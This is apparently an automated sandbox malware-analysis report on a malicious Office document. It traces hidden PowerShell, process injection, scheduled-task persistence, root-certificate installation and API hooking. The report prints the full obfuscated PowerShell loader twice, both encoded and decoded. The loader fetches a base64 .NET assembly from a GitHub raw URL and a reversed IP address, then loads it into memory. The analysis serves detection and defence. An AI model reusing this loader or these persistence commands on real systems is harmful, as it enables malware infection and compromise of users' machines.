Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00913AE1 LoadLibraryW,GetProcAddress,FreeLibrary, 27_2_00913AE1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_002521C8 push ebx; iretd 15_2_002521EA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_002525C8 push ebx; retf 15_2_002525EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_002596F4 push eax; iretd 17_2_002596FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 17_2_00252A51 push eax; ret 17_2_00252A81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_0041F05F push ecx; ret 22_2_0041F060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 22_2_009FDFA1 push ecx; ret 22_2_009FDFB4
Source: C:\Windows\explorer.exe Code function: 23_2_02828B02 push esp; retn 0000h 23_2_02828B03
Source: C:\Windows\explorer.exe Code function: 23_2_02828B1E push esp; retn 0000h 23_2_02828B1F
Source: C:\Windows\explorer.exe Code function: 23_2_028289B5 push esp; retn 0000h 23_2_02828AE7
Source: C:\Windows\explorer.exe Code function: 23_2_05FC59B5 push esp; retn 0000h 23_2_05FC5AE7
Source: C:\Windows\explorer.exe Code function: 23_2_05FC5B1E push esp; retn 0000h 23_2_05FC5B1F
Source: C:\Windows\explorer.exe Code function: 23_2_05FC5B02 push esp; retn 0000h 23_2_05FC5B03
Source: C:\Windows\explorer.exe Code function: 23_2_0610EB1E push esp; retn 0000h 23_2_0610EB1F
Source: C:\Windows\explorer.exe Code function: 23_2_0610EB02 push esp; retn 0000h 23_2_0610EB03
Source: C:\Windows\explorer.exe Code function: 23_2_0610E9B5 push esp; retn 0000h 23_2_0610EAE7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00938B01 push ecx; ret 27_2_00938B14
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_021EDFA1 push ecx; ret 27_2_021EDFB4
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009F05F push ecx; ret 27_2_0009F060
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009D485 push eax; ret 27_2_0009D4D8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009D4DB push eax; ret 27_2_0009D542
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009D4D2 push eax; ret 27_2_0009D4D8
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0009D53C push eax; ret 27_2_0009D542
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_000975C5 push eax; retf 27_2_000975DC
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, KOyxUxFkac9s0mWEiL.cs High entropy of concatenated method names: 'ToString', 'p1Io7wlQLf', 'n1go09VejO', 'GONoJGQBVR', 'Quioe5FUUw', 'FNyo2vBnbi', 'XkroQlkYFY', 'uGloKae8Aa', 'Y8woLqp3if', 'ULCoROHWad'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, Npll84EqJnqes8PU4k.cs High entropy of concatenated method names: 'EiqdxyPjgQ', 'mmQdXyGpQ0', 'sFXdOfcI2L', 'onHdg6hmlN', 'S4adnE824e', 'FdmOlNQT4T', 'eelOVZPifr', 'SiEOwk0e6K', 'ImROhF9UQW', 'bA1Oyaf6E6'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.cs High entropy of concatenated method names: 'oiscxBR8Ar', 'gxDc8MfsRP', 'RpDcXwYabl', 'DVfcI1KYCP', 'kXAcO53D4e', 'Sw2cd2Joni', 'eaScg4UBD9', 'N10cnFufxY', 'N9tc5DjZgu', 'pBIcbB2uBw'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, Q2oJDmy00BXR9JkIeC.cs High entropy of concatenated method names: 'WsPvEfxg0Y', 'mCJv0i3v1f', 'PwZvJVehf7', 'kZMveKVBWk', 'VYDvHVyuBD', 'TrGv22FWCP', 'Next', 'Next', 'Next', 'NextBytes'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, igFyWPPDbgu1vlvK0Rv.cs High entropy of concatenated method names: 'uD5SBOJIet', 'FnHSuHxmsg', 'iMISMZb1D5', 'ePxTaIk9Kj3dSZWMIXK', 'EMWeR8kNqSCHhpVGGpQ', 'f3xYBeks2prfBOPELmc', 'NbMpfHk1NYvkoU7mMFA'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, Khu1KpRl9QfJpTnZtS.cs High entropy of concatenated method names: 'tbegB17O8M', 'oUDguks6m0', 'rFrgMoRTbF', 'z1dgpHG8RC', 'TbOgtJbQ5s', 'L6YgmFrJfA', 'A9Lg3ZNYte', 'uHhgC4Q70Z', 'wR1gTh20pn', 'A2QgUFRyoN'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, XhLOTNDGt3lebXMjYs.cs High entropy of concatenated method names: 'ngAMlnOD5', 'PsEppJsVG', 'TrgmpVlIO', 'cBT3K9uMI', 'vc5T4Idtc', 'OohURnBjm', 'RXA6rOIo1D55MKNOB7', 'OxfjHwc2Qr86E1ZRcl', 'iXFvVVUfo', 'CBJSgeACw'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, wflNJsPW7xG5EuwBK3u.cs High entropy of concatenated method names: 'Q4faBCr1Sg', 'mlDauPZoLf', 'UcJaMMcL9N', 'VhyapZyJpp', 'T0katyV2ti', 'UqJamtHy6C', 'sR6a3jL9Xf', 'MvTaCdEvNy', 'VI6aTQO80S', 'iS4aUdI9CX'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, UnlIYYVlFoWapW9hnd.cs High entropy of concatenated method names: 'hDSYh4lAL8', 'X6tYidIxlw', 'xHVvWASXL2', 'vtGvPBXXrZ', 'c0iY7BnH0F', 'BXYYZ40Jfk', 'TykY6a8pBG', 'aQSYHaAXW9', 'MR8YqrdqCk', 'wceYFnoCme'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, FOl8GuzMLVRcEJqPxI.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'o2va9sOLyb', 'idkakVbnOF', 'uUNaoLWJA9', 'AQAaYE8exk', 'GoNav2M7Ep', 'sTdaaObRTC', 'KvKaSVb66y'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, UoImFtINJ1OjinSk4C.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'qLNDymKAEa', 'G0uDi9nX9O', 'bjmDzFfNop', 'VaqcWRBs7A', 'QCOcP6cfy5', 'Rh8cDEpFVx', 'wZZccLmZfi', 'jB9UTdHl53g0VC9MEK7'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, lx0luIHPk66GXESpS8.cs High entropy of concatenated method names: 'dN6kNSoFJK', 'Ld7kZSshZ5', 'Mp5kHf1YXU', 'gGdkqgFxRe', 'Yqek04ibpT', 'b3JkJcTclG', 'z9BkeIvs70', 'mAHk28B9S4', 'Hj8kQNMeE1', 'LKDkK2bYBl'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DHuktyKo2fycCX3uA0.cs High entropy of concatenated method names: 'OmSg8A0hZm', 'ChIgIh26XA', 'XFJgdiVIPA', 'oPjdij3e7K', 's22dzisAiV', 'QSOgWNIBPs', 'nYNgPo5NjW', 'HCOgDOor3w', 'NJxgcQxfDk', 'G25gAqqKJe'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, b453MoAcKKbNNntlid.cs High entropy of concatenated method names: 'ycJPgmBC8b', 'TH7PnH4rWr', 'zioPbH5J7Q', 'z8EPjgAenF', 'tsxPk1ONpl', 'U84PoqJnqe', 'kkyG2eN601FUBwSQIA', 'Yc7TpLKhlgBWkhJDnu', 'EiGvhm968rTiNQTrdl', 'xhkPPS2OuL'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, dkL5LD6m60pv1U2kLX.cs High entropy of concatenated method names: 's0A9CsjUvA', 'jJU9TQxExr', 'eie9Eh2k8c', 'EpK90Vh6BW', 'xN79eAp2NA', 'H2w92sLRiO', 'a8a9KVqnkJ', 'mWJ9LXY7mI', 'Xfu9NDHDxy', 'iZt97mbVwt'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, LGaigNPPLtls99aPKjL.cs High entropy of concatenated method names: 'ToString', 'LLiScVapPY', 'BjqSAxAmQ4', 'lb3Sxit3na', 'K8GS8OkNGp', 'JKqSX1uiM5', 'QJfSIr2V4a', 'QdSSOH3Hcy', 'XGdpWckhIDU9FHrSnAo', 's3wxLukiwwu23v2Ci4L'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, yfTGjUPcXKcvNssMea7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DFDSHrAuqP', 'IX2SqwlZqs', 'OakSFT5AOg', 'BVwSfmNSbK', 'pfJSlhlDSl', 'dUVSVrEa9p', 'ev6SwAHIBY'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, ePUHBFXDid6So55xZG.cs High entropy of concatenated method names: 'Dispose', 'IynPywLwYj', 'uyqD0psZ7y', 'baJ22AHUf8', 'VedPiaVXkg', 'UbWPzW3jBt', 'ProcessDialogKey', 'Uh6DW2oJDm', 'H0BDPXR9Jk', 'heCDDFFwaK'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, HeZOc7fKQgt0IZRHSL.cs High entropy of concatenated method names: 'VNZYbUx198', 'UiEYjeMLLG', 'ToString', 'fn4Y8rLMBj', 'VtgYXYMXFS', 'xDSYIsUHvu', 'jufYOG604J', 'qLDYd5AQ1C', 'k0CYgR6Xry', 'FpNYnKanvl'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, IdaVXkhglbWW3jBtVh.cs High entropy of concatenated method names: 'drav8H5Wr8', 'xYDvXICKXM', 'EaNvIEvHhc', 'C25vORkbut', 'LVrvdLvCTD', 'SBXvg6My6Q', 'IgLvngodex', 'Dk8v5qSX0o', 'ufyvbYRGTH', 'VaNvj4gDWA'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, ImBC8bCfH7H4rWrIxE.cs High entropy of concatenated method names: 'YPvXHvAOlF', 'kmYXqD6Fdv', 'iYsXFh7Q07', 'aAiXfwqJK3', 'WudXlcVwCm', 'OEtXVC6o7v', 'LHqXwrxHIM', 'tPaXhSgNQ6', 'M85XyuN8bh', 'zWCXivckDV'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, SFwaKsiGrDwLLYJkD9.cs High entropy of concatenated method names: 'OfWaPFkmfo', 'b8Zacx1u2m', 'wUaaA5gjxg', 'CKVa8iOaN8', 'LxvaXpYmHj', 'MXUaOlhjJR', 'UUMadBVxvB', 'VGavwP0WaT', 'xtuvhB9NDI', 'neVvyJ8rOC'
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, LqBjGMTioH5J7QM8Eg.cs High entropy of concatenated method names: 'rFfIpX79wa', 'LV1ImRQ2GD', 'RWLICx5nZ8', 'tCbITLL9vn', 'i5EIkMyvtR', 'y74IoMWdpe', 'oRtIY0JX63', 'amaIvKIXgj', 'ORSIaScTLf', 'ioqISn6f4K'

Persistence and Installation Behavior
barindex
Microsoft Office launches external ms-search protocol handler (WebDAV)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\m2g.me@SSL\DavWWWRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\m2g.me@SSL\DavWWWRoot Jump to behavior
Installs new ROOT certificates
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Office drops RTF file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].doc.0.dr Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: 6035E009.doc.4.dr Jump to dropped file
Office viewer loads remote template
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe File created: C:\Users\user\AppData\Roaming\niLILOT.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE4
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008E88BF IsIconic,GetWindowPlacement,GetLastError,IsZoomed,SetWindowPlacement,GetLastError,SetWindowPos,SetWindowPos,GetClientRect,MoveWindow, 27_2_008E88BF
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008E8810 IsIconic,GetWindowPlacement,GetLastError, 27_2_008E8810
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008EC869 LoadCursorW,SetCursor,DefWindowProcW,IsIconic,GetCursorPos,GetTitleBarInfo,SetCursorPos,SendMessageW, 27_2_008EC869
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008E99FA DefWindowProcW,IsIconic,GetClientRect,GetLastError,VariantClear,CheckMenuItem,DefWindowProcW, 27_2_008E99FA
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008EC134 IsWindowVisible,IsIconic, 27_2_008EC134
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_00920BF5 GetWindowRect,GetWindowRect,IsWindow,IsIconic,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetWindowRect,PtInRect,PtInRect,PtInRect,SystemParametersInfoW,CopyRect,SetWindowPos, 27_2_00920BF5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008EB319 LockWindowUpdate,IsIconic,GetWindowPlacement,GetWindowLongW,SetWindowLongW,SetWindowLongW,SetWindowLongW,ShowWindow,SetWindowPos,SetWindowPos,SetWindowPos,LockWindowUpdate, 27_2_008EB319
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008EA341 IsZoomed,IsIconic,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem, 27_2_008EA341
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008EBCCB GetWindowRect,GetWindowLongW,GetWindowLongW,GetWindowLongW,AdjustWindowRectEx,IntersectRect,MoveWindow,IsIconic,GetWindowPlacement, 27_2_008EBCCB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008E6416 IsIconic,GetWindowPlacement,GetWindowRect, 27_2_008E6416
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
